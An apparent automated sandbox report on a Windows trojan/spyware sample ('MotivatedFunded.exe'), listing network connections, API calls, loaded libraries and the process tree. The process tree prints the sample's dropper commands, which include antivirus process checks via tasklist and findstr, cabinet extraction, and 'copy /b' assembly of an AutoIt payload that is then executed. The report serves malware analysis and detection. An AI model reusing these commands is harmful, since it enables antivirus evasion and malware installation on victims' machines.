      Source: MotivatedFunded.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: MotivatedFunded.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: MotivatedFunded.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
      Source: MotivatedFunded.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: MotivatedFunded.exeString found in binary or memory: http://ocsp.digicert.com0
      Source: MotivatedFunded.exeString found in binary or memory: http://ocsp.digicert.com0A
      Source: MotivatedFunded.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: MotivatedFunded.exeString found in binary or memory: http://ocsp.digicert.com0X
      Source: Sv.9.dr, Dl.com.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: Sv.9.dr, Dl.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: Sv.9.dr, Dl.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: Sv.9.dr, Dl.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: Sv.9.dr, Dl.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: Sv.9.dr, Dl.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: Amcache.hve.13.drString found in binary or memory: http://upx.sf.net
      Source: Dl.com, 0000000D.00000000.2210897237.0000000000C45000.00000002.00000001.01000000.00000007.sdmp, Barbados.9.dr, Dl.com.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
      Source: MotivatedFunded.exeString found in binary or memory: http://www.digicert.com/CPS0
      Source: Sv.9.dr, Dl.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Dl.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
      Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
      Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49850 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49861 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49870 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49878 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49895 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49905 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49913 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49922 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49936 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.5:49944 version: TLS 1.2
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
      Source: C:\Users\user\Desktop\MotivatedFunded.exeFile created: C:\Windows\BdIndustriesJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeFile created: C:\Windows\CustomsYoungerJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeFile created: C:\Windows\SpringIgnoreJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeFile created: C:\Windows\ConceptTheeJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_0040497C0_2_0040497C
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_00406ED20_2_00406ED2
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_004074BB0_2_004074BB
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\755831\Dl.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: String function: 004062A3 appears 58 times
      Source: MotivatedFunded.exeStatic PE information: invalid certificate
      Source: MotivatedFunded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/25@14/3
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:616:120:WilError_03
      Source: C:\Users\user\Desktop\MotivatedFunded.exeFile created: C:\Users\user\AppData\Local\Temp\nst62CD.tmpJump to behavior
      Source: MotivatedFunded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Users\user\Desktop\MotivatedFunded.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: MotivatedFunded.exeReversingLabs: Detection: 23%
      Source: C:\Users\user\Desktop\MotivatedFunded.exeFile read: C:\Users\user\Desktop\MotivatedFunded.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\MotivatedFunded.exe "C:\Users\user\Desktop\MotivatedFunded.exe"
      Source: C:\Users\user\Desktop\MotivatedFunded.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Calculator Calculator.cmd & Calculator.cmd
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 755831
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Delhi
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "jerusalem" Bangladesh
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 755831\Dl.com + Warriors + Spas + Douglas + Sport + Msg + Garmin + Frederick + Barbados + Sv 755831\Dl.com
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Fw + ..\Brighton + ..\Earliest + ..\Heritage + ..\Claim + ..\Vg + ..\Hardcover + ..\Appropriate g
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\755831\Dl.com Dl.com g
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
      Source: C:\Users\user\Desktop\MotivatedFunded.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Calculator Calculator.cmd & Calculator.cmdJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 755831Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E DelhiJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "jerusalem" Bangladesh Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 755831\Dl.com + Warriors + Spas + Douglas + Sport + Msg + Garmin + Frederick + Barbados + Sv 755831\Dl.comJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Fw + ..\Brighton + ..\Earliest + ..\Heritage + ..\Claim + ..\Vg + ..\Hardcover + ..\Appropriate gJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\755831\Dl.com Dl.com gJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: wsock32.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: version.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ntvdm64.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: MotivatedFunded.exeStatic file information: File size 1158388 > 1048576
      Source: MotivatedFunded.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\MotivatedFunded.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
      Source: MotivatedFunded.exeStatic PE information: real checksum: 0x12231a should be: 0x12489d

      Persistence and Installation Behavior

      barindex
      Drops PE files with a suspicious file extension
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\755831\Dl.comJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\755831\Dl.comJump to dropped file
      Source: C:\Users\user\Desktop\MotivatedFunded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\MotivatedFunded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\755831\Dl.comProcess information set: NOOPENFILEERRORBOXJump to behavior
